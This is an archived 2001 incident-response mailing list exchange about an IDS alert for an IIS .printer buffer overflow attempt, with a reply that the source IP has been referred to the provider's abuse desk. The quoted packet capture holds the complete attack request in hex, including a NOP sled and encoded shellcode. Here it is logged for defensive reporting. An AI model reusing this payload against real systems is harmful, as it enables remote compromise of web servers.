Re: Attempted WEB-IIS printer attempt Buffer Overflow

• Previous message: Raul Dias: "Re: possible frontpage exploit?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> Date of Attack:  Jul 14, 2001
> Time of Attack: 09:00:38 am EDT
> 
> Source of Attack: 
> IP Address: 198.109.163.170
> 
> Destination of Attack:
> IP Address: 216.18.61.98
> Port: 80
> Protocol: TCP
> 
> 
> Description: 
> - Intruder attempted to access the printer isapi filter.
> 
> Link: http://www.whitehats.com/info/IDS533

The IP address in question belongs to AT&T Broadband and Information
Services in East Lansing.  I have passed your message on to
"abuseat_private" for further action.

Doug Nelson			nelsonat_private
Network Manager			Ph: (517) 353-2980
Computer Laboratory
Michigan State University


> [**] WEB-IIS printer attempt [**]
> Jul 14,01 09:00:38am    198.109.163.170:3265 -> 216.18.61.98:80
> TTL: 46 TOS: 0x0        ID:1675
> ***AP*** Seq: 3550615295 Ack: 2075228853 Win: 32120
> 
> 474554202F4E554C4C2E7072696E746572204854       GET./NULL.printer.HT
> 54502F312E300D0A4265617675683A2090909090        TP/1.0..Beavuh:.....
> 90909090909090909090909090909090EB035DEB        ..................].
> 05E8F8FFFFFF83C5159090908BC533C966B9D702        ..............3.f...
> 5080309540E2FA2D959564E214ADD8CF0595E196        P.0.@..-..d.........
> DD7E607D95959595C81E40147F9A6B6A6A1E4D1E        .~`}......@...kjj.M.
> E6A996661EE3ED96661EEBB5966E1EDB81A678C3        ...f....f....n....x.
> C2C41EAA966E1E672C9B9595956633E19DCCCA16        .....n.g,....f3.....
> 5291D07772CCCACB1E581ED3B1965644749654A6        R..wr....X....VDt.T.
> 5CF31E9D1ED389965654749796541E9596561E67        \.......VTt..T...V.g
> 1E6B1E452C9E9595957DE1949595A655391055E0        .k.E,....}.....U9.U.
> 6CC7C36AC241CF1E4D2C939595957DCE94959552        l..j.A..M,....}....R
> D2F19995959552D2FD9595959552D2F994959595        ......R......R......
> FF9518D2F1C518D285C518D281C56AC255FF9518        ..............j.U...
> D2F1C518D28DC518D289C56AC25552D2B5D19595        ...........j.UR.....
> 9518D2B5C56AC2511ED2851CD2C91CD2F51ED289        .....j.Q............
> 1CD2CD14DAD994949595F352D2C5959518D2E5C5        ...........R........
> 18D2B5C5A655C5C5C5FF94C5C57D95959595C814        .....U.......}......
> 78D56B6A6AC0C56AC25D6AE2856AC2716AE2896A        x.kjj..j.]j..j.qj..j
> C271FD95919595FFD56AC2451E7DC5FD94949595        .q.......j.E.}......
> 6AC27D10559A103F959595A655C5D5C5D5C56AC2        j.}.U..?....U.....j.
> 79166D6A9A11029595951E4DF352929795F352D2        y.mj.......M.R....R.
> 9796ED52D291AA8D3EB6FF851892C5C66AC261FF        ...R....>.......j.a.
> A76AC249A65CC4C3C4C4C46AE2816AC2591055E1        .j.I.\.....j..j.Y.U.
> F50505050515AB95E1BA05050505FF95C3FD9591        ....................
> 9595C06AE2816AC24D1055E1D505050505FF956A        ...j..j.M.U........j
> A3C0C66AC26D166D6AE1BB050505057E27FF95FD        ...j.m.mj......~'...
> 95919595C0C66AC2691055E98D05050505E109FF        ......j.i.U.........
> 95C3C5C06AE28D6AC241FFA76AC2497E1FC66AC2        ....j..j.A..j.I~..j.
> 65FF956AC275A655391055E06CC4C7C3C66A47CF        e..j.u.U9.U.l....jG.
> CC3E777B56D2F0E1C5E7FAF6D4F1F1E7F0E6E695        .>w{V...............
> D9FAF4F1D9FCF7E7F4E7ECD495D6E7F0F4E1F0C5        ....................
> FCE5F095D2F0E1C6E1F4E7E1E0E5DCFBF3FAD495        ....................
> D6E7F0F4E1F0C5E7FAF6F0E6E6D495C5F0F0FEDB        ....................
> F4F8F0F1C5FCE5F095D2F9FAF7F4F9D4F9F9FAF6        ....................
> 95C2E7FCE1F0D3FCF9F095C7F0F4F1D3FCF9F095        ....................
> C6F9F0F0E595D0EDFCE1C5E7FAF6F0E6E695D6F9        ....................
> FAE6F0DDF4FBF1F9F095C2C6DAD6DEA6A795C2C6        ....................
> D4C6E1F4E7E1E0E595E6FAF6FEF0E195F6F9FAE6        ....................
> F0E6FAF6FEF0E195F6FAFBFBF0F6E195E6F0FBF1        ....................
> 95E7F0F6E395F6F8F1BBF0EDF0950D0A486F7374        ................Host
> 3A20909090909090909090909090909090909090        :...................
> 9090909090909090909090909090909090909090        ....................
> 9090909090909090909090909090909090909090        ....................
> 9090909090909090909090909090909090909090        ....................
> 9090909090909090909090909090909090909090        ....................
> 9090909090909090909090909090909090909090        ....................
> 9090909090909090909090909090909090909090        ....................
> 9090909090909090909090909090909090909090        ....................
> 9090909090909090909090909090909090909090        ....................
> 9090909090909090909090909090909090909090        ....................
> 9090909090909090909090909090909090909090        ....................
> 9090909090909090909090909090909090909090        ....................
> 9090909090909090909090909090909090909090        ....................
> 9090909090909090909090909090909090909090        ....................
> 9090909090909090909090909090909090909090        ....................
> 9090909090909090909090909090909090909090        ....................
> 909090909090909090909033C0B09003D88B038B        ...........3........
> 406033DBB32403C3FFE0EBB9909005318C6A0D0A        @`3..$.........1.j..
> 0D0A                                            ..                  
> 
> 
> ---
> Jason Robertson                
> Network Analyst            
> jasonat_private    
> http://www.astroadvice.com      
> 



----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

http://aris.securityfocus.com

• Next message: Nick FitzGerald: "Re: SMTP server (How can I find out the real source of an attack"
• Previous message: Raul Dias: "Re: possible frontpage exploit?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 10:14:22 PDT